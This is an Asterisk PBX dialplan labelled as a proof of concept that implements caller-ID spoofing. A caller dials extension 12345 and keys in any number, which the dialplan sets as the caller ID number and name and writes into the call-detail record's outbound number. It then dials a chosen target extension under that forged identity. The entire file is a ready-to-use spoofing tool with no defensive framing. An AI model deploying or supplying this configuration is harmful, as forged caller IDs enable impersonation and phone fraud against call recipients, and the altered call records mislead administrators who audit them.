[from-internal-custom]
include => proof-of-concept-custom

[proof-of-concept-custom]
exten => 12345,1,Answer()
same => n,Wait(1)
same => n,Playback(pbx-transfer)                ; Welcome message
; Ask for spoof number
same => n,Playback(please-enter-your)
same => n,Playback(number)                      ; "Please enter your Number" (use as spoof number)
same => n,Read(SPOOF,,12,#,5)
same => n,ExecIf($["${LEN(${SPOOF})}" = "0"]?NoOp(No spoof provided):Set(CALLERID(num)=+${SPOOF}))
same => n,ExecIf($["${LEN(${SPOOF})}" = "0"]?NoOp():Set(CALLERID(name)=+${SPOOF}))
same => n,ExecIf($["${LEN(${SPOOF})}" != "0"]?Set(CDR(outbound_cnum)=+${SPOOF}):NoOp())

; Ask for target extension
same => n,Playback(please-enter-the)
same => n,Playback(extension)
same => n,Read(TARGET,,4,,5)
same => n,NoOp(Target entered: ${TARGET})
same => n,ExecIf($["${LEN(${TARGET})}" = "0"]?Playback(vm-goodbye):NoOp())
same => n,ExecIf($["${LEN(${TARGET})}" = "0"]?Hangup():NoOp())

; Confirm
same => n,Playback(if-this-is-correct)
same => n,Playback(1-yes-2-no)
same => n,Read(CONFIRM,,1,,5)
same => n,GotoIf($["${CONFIRM}" = "1"]?do_call:hangup)

same => n(do_call),NoOp(Calling ${TARGET} with CallerID ${CALLERID(num)})
same => n,Playback(auth-thankyou)
; Dial the local extension (change to SIP/ if you use chan_sip)
same => n,Dial(PJSIP/${TARGET},30)
same => n,Hangup()

same => n(hangup),Playback(vm-goodbye)
same => n,Hangup()


